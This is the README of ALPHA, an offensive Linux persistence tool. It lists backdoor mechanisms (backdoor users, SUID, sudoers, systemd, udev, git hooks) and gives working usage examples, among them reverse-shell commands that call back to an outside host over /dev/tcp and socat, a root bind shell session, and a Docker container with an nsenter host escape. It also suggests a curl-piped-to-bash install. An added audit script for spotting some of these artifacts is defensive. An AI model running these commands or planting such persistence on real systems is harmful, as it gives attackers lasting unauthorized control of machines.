ALPHA is a Linux persistence tool for security research, detection engineering, penetration testing, and CTFs. It prioritizes functionality over stealth and is easily detectable on targets with a strong security posture. ALPHA is supported on popular distributions like Debian, Ubuntu, and RHEL, and is highly customizable to fit various OS environments.
ALPHA provides a versatile suite of features for simulating and researching Linux persistence mechanisms, which are displayed in the table below:
Feature | Description | Root | User |
---|---|---|---|
At Job Persistence | At job persistence | ✓ | ✓ |
Authorized Keys Management | Add public key to authorized keys | ✓ | ✓ |
Backdoor User | Create backdoor user | ✓ | ✗ |
Bind Shell | Execute backgrounded bind shell | ✓ | ✓ |
Capabilities Backdoor | Add capabilities persistence | ✓ | ✗ |
Cron Job Persistence | Cron job persistence | ✓ | ✓ |
Create User | Create a new user | ✓ | ✗ |
Git Persistence | Git persistence | ✓ | ✓ |
Generator Persistence | Generator persistence | ✓ | ✗ |
Init.d Backdoor | SysV Init (init.d) persistence | ✓ | ✗ |
Malicious Docker Container | Docker container with host escape | ✓ | ✓ |
MOTD Backdoor | Message Of The Day (MOTD) persistence | ✓ | ✗ |
Package Manager Persistence | Package Manager persistence (APT/YUM/DNF) | ✓ | ✗ |
Password Management | Add user to /etc/passwd directly | ✓ | ✗ |
Password Change | Change user password | ✓ | ✗ |
Rc.local Backdoor | Run Control (rc.local) persistence | ✓ | ✗ |
Shell Profile Persistence | Shell profile persistence | ✓ | ✓ |
SSH Key Persistence | SSH key persistence | ✓ | ✓ |
Sudoers Backdoor | Sudoers persistence | ✓ | ✗ |
SUID Backdoor | SUID persistence | ✓ | ✗ |
System Binary Backdoor | System binary persistence | ✓ | ✗ |
Systemd Service Persistence | Systemd service persistence | ✓ | ✓ |
Udev Persistence | Udev (driver) persistence | ✓ | ✗ |
XDG Autostart Persistence | XDG autostart persistence | ✓ | ✓ |
ALPHA offers comprehensive support/compatibility for each of the features across various Linux distributions and environments.
Distribution | Support | Tested |
---|---|---|
Debian | ✓ | Tested on Debian 11 & 12 |
Ubuntu | ✓ | Tested on Ubuntu 22.04 |
RHEL | ✓ | Tested on RHEL 9 (MOTD unavailable) |
CentOS | ✓ | Tested on CentOS Stream 9, 7 (MOTD unavailable) |
Fedora | ✓ | ✗ |
Arch Linux | ✓ | ✗ |
OpenSUSE | ✓ | ✗ |
Some custom Linux distributions may have different paths, causing mechanisms to fail on untested versions. While most persistence mechanisms are supported, older versions may lack specific services. If a default command fails, the --custom flag in most features allows you to customize paths/commands to suit your environment. If that doesn't work, you can examine the script to understand and adapt it to your distribution.
Contributions through PRs or issues for new features or ideas are welcome!
Getting this up and running is as simple as downloading the script and executing it.
```
curl ... | bash
```
Executing the script will show either the root or the user help menu, depending on the privileges the current user has.
```
alpha@alpha-demo:~$ sudo ./alpha.sh
▄▄▄ ██▓ ██▓███ ██░ ██ ▄▄▄
▒████▄ ▓██▒ ▓██░ ██▒▓██░ ██▒▒████▄
▒██ ▀█▄ ▒██░ ▓██░ ██▓▒▒██▀▀██░▒██ ▀█▄
░██▄▄▄▄██ ▒██░ ▒██▄█▓▒ ▒░▓█ ░██ ░██▄▄▄▄██
▓█ ▓██▒░██████▒▒██▒ ░ ░░▓█▒░██▓ ▓█ ▓██▒
▒▒ ▓▒█░░ ▒░▓ ░▒▓▒░ ░ ░ ▒ ░░▒░▒ ▒▒ ▓▒█░
▒ ▒▒ ░░ ░ ▒ ░░▒ ░ ▒ ░▒░ ░ ▒ ▒▒ ░
░ ▒ ░ ░ ░░ ░ ░░ ░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░ ░
Aegrah's Linux Persistence Honed Assistant (ALPHA)
Github: https://github.com/Aegrah/ALPHA
Twitter: https://twitter.com/RFGroenewoud

Root User Options:
--at                  At job persistence
--authorized-keys     Add public key to authorized keys
--backdoor-user       Create backdoor user
--bind-shell          Execute backgrounded bind shell
--cap                 Add capabilities persistence
--create-user         Create a new user
--cron                Cron job persistence
--docker-container    Docker container with host escape
--generator           Generator persistence
--git                 Git hook/pager persistence
--initd               SysV Init (init.d) persistence
--malicious-package   Build and Install a package for persistence (DNF/RPM)
--motd                Message Of The Day (MOTD) persistence (not available on RHEL derivatives)
--package-manager     Package Manager persistence (APT/YUM/DNF)
--passwd-user         Add user to /etc/passwd directly
--password-change     Change user password
--rc-local            Run Control (rc.local) persistence
--shell-profile       Shell profile persistence
--ssh-key             SSH key persistence
--sudoers             Sudoers persistence
--suid                SUID persistence
--system-binary       System binary persistence
--systemd             Systemd service persistence
--udev                Udev (driver) persistence
--xdg                 XDG autostart persistence
--revert              Revert most changes made by ALPHA's default options
--quiet (-q)          Quiet mode (no banner)
```
The script should be largely self-explanatory; nevertheless, this section shows a few examples of how to work with ALPHA.
Every persistence mechanism has a separate help menu:
```
root@ubuntu2204:/home/ruben# ./alpha.sh --udev --help
Usage: ./alpha.sh --udev [OPTIONS]
--examples                 Display command examples
--default                  Use default udev settings
  --ip <ip>                Specify IP address
  --port <port>            Specify port number
  --at | --cron | --systemd  Specify the mechanism to use
--custom                   Use custom udev settings
  --command <command>      Specify custom command
  --path <path>            Specify custom path
```
Every persistence mechanism also has an --examples flag that shows default and custom examples, helping in crafting the command that works for you.
```
root@ubuntu2204:/home/ruben# ./alpha.sh --git --examples
Examples:
--default:
./alpha.sh --git --default --ip 10.10.10.10 --port 1337 --hook|--pager
--custom:
./alpha.sh --git --custom --command "(nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 &) &" --path "gitdir/.git/hooks/pre-commit" --hook
./alpha.sh --git --custom --command "nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 & ${PAGER:-less}" --path "~/.gitconfig --pager"
```
Most of the persistence mechanisms are very simple, and will (hopefully) not require much explanation. For example, Systemd persistence can be set up simply through:
```
root@ubuntu2204:/home/ruben# ./alpha.sh --systemd --default --ip 10.10.10.10 --port 1337
Service file created successfully!
Timer file created successfully!
Created symlink /etc/systemd/system/timers.target.wants/dbus-org.freedesktop.resolved.timer → /usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer.
[+] Systemd service persistence established!
```
When setting up a specific persistence mechanism, the script tells you whether it worked, and where extra information is needed to work with the mechanism, that information is printed as well. For example, the bind shell mechanism:
```
root@ubuntu2204:/home/ruben# ./alpha.sh --bind-shell --default --architecture x64
[+] Bind shell binary /tmp/bd64 created and executed in the background.
[+] The bind shell is listening on port 9001.
[+] To interact with it from a different system, use: nc -nv <IP> 9001
[+] Bind shell persistence established!
```
This lets you interact with the bind shell:
```
❯ nc -nv 192.168.211.130 9001
(UNKNOWN) [192.168.211.130] 9001 (?) open
whoami
root
```
The same goes for mechanisms that have additional built-in features such as the Docker persistence mechanism, with a built-in root host escape:
```
ruben@ubuntu2204:~$ sudo ./alpha.sh --docker-container --ip 192.168.211.131 --port 330
[+] Building 10.4s (9/9) FINISHED docker:default
=> [internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 722B 0.0s
=> [internal] load metadata for docker.io/library/alpine:latest 2.1s
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [1/5] FROM docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 0.8s
=> => resolve docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 0.0s
=> => sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 1.85kB / 1.85kB 0.0s
=> => sha256:dabf91b69c191a1a0a1628fd6bdd029c0c4018041c7f052870bb13c5a222ae76 528B / 528B 0.0s
=> => sha256:a606584aa9aa875552092ec9e1d62cb98d486f51f389609914039aabd9414687 1.47kB / 1.47kB 0.0s
=> => sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99 3.62MB / 3.62MB 0.4s
=> => extracting sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99 0.2s
=> [2/5] RUN apk add --no-cache bash socat sudo util-linux procps 4.4s
=> [3/5] RUN adduser -D lowprivuser 0.6s
=> [4/5] RUN echo '#!/bin/bash' > /usr/local/bin/entrypoint.sh && echo 'while true; do /bin/bash -c "socat exec:\"/bin/bash\",pty,stderr,setsid,sigint,sane tcp:192.168.211.131:330" 0.8s
=> [5/5] RUN echo '#!/bin/bash' > /usr/local/bin/escape.sh && echo 'sudo nsenter -t 1 -m -u -i -n -p -- su -' >> /usr/local/bin/escape.sh && chmod +x /usr/local/bin/escape.sh && ec 0.8s
=> exporting to image 0.6s
=> => exporting layers 0.6s
=> => writing image sha256:b36eb0d13ee1a0c57c3e6a1ee0255ef474986f44d65b177c539b2ffb1d248790 0.0s
=> => naming to docker.io/library/malicious-container 0.0s
86ce6b00e872bb8c21d0dae21e747e830bb70b44ab7946558e563bf7f4b626ef
[+] Persistence through malicious Docker container complete.
[+] To escape the container with root privileges, run '/usr/local/bin/escape.sh'.
```
This tells you exactly how to escape the container and get access to the host:
```
❯ nc -nvlp 330
listening on [any] 330 ...
connect to [192.168.211.131] from (UNKNOWN) [192.168.211.130] 43400
86ce6b00e872:/$ /usr/local/bin/escape.sh
/usr/local/bin/escape.sh
root@ubuntu2204:~#
```
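Both the systemd session and the Docker session above leave host-side artifacts a detection engineer can audit for: a timer whose unit file lives under /usr/local/lib/systemd/system, and a container that can run `nsenter -t 1` against the host. The script below is an added example written for this README, not part of ALPHA; it runs two such checks over constructed sample lines (the `find` and `docker inspect` commands in the comments show how to feed it real data, and the "->" arrow in the sample stands in for the "→" systemd prints).

```shell
#!/usr/bin/env bash
# Added audit helpers for two artifacts the sessions above leave behind (example
# code written for this README, not part of ALPHA). All inputs are constructed
# sample lines, not live host data.

# Timer symlinks: flag any whose target unit file sits outside the distro unit
# directories. ALPHA's --systemd default lands in /usr/local/lib/systemd/system.
# Input line shape "<symlink> -> <target>", e.g. from:
#   find /etc/systemd/system/timers.target.wants -type l -printf '%p -> %l\n'
flag_timer_links() {
  local line link target
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    link=${line%% -> *}
    target=${line##* -> }
    case "$(dirname "$target")" in
      /lib/systemd/system|/usr/lib/systemd/system|/etc/systemd/system) ;;
      *) printf 'SUSPICIOUS timer %s -> %s\n' "$(basename "$link")" "$target" ;;
    esac
  done
}

# Containers: flag those running privileged or in the host PID namespace, the
# two settings an "nsenter -t 1" escape like escape.sh depends on (it must see
# the host's PID 1 and hold the capabilities to enter its namespaces).
# Input line shape "<name> <privileged> <pidmode>", e.g. from:
#   docker inspect --format '{{.Name}} {{.HostConfig.Privileged}} {{.HostConfig.PidMode}}' $(docker ps -q)
flag_containers() {
  local name priv pidmode
  while read -r name priv pidmode; do
    [ -n "$name" ] || continue
    if [ "$priv" = "true" ] || [ "$pidmode" = "host" ]; then
      printf 'SUSPICIOUS container %s privileged=%s pid=%s\n' "$name" "$priv" "$pidmode"
    fi
  done
}

# Constructed samples modelled on the sessions above (one bad, one benign each).
SAMPLE_TIMERS='/etc/systemd/system/timers.target.wants/dbus-org.freedesktop.resolved.timer -> /usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer
/etc/systemd/system/timers.target.wants/apt-daily.timer -> /lib/systemd/system/apt-daily.timer'
SAMPLE_CONTAINERS='/malicious-container true host
/nginx false'

printf '%s\n' "$SAMPLE_TIMERS" | flag_timer_links
printf '%s\n' "$SAMPLE_CONTAINERS" | flag_containers
```

Units placed in /etc/systemd/system by an administrator pass the first check, so pair it with a review of what is in that directory; the second check flags host-PID-namespace containers even when they are not privileged.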
Publications in which ALPHA is leveraged:
- Linux Detection Engineering - The Basics of Linux Persistence (will be published soon...)
- Linux Detection Engineering - Beyond the Basics of Linux Persistence (will be published soon...)
Feel free to check out my socials for updates on (Linux) security research.
By sharing ALPHA, you can assist others in testing and improving their security posture and support the development of new detection capabilities in Linux security.
ALPHA is intended for authorized security testing and research purposes only. Misuse of this tool for malicious activities is not condoned and is entirely at the user's own risk. By using ALPHA, you agree that you are responsible for your own actions.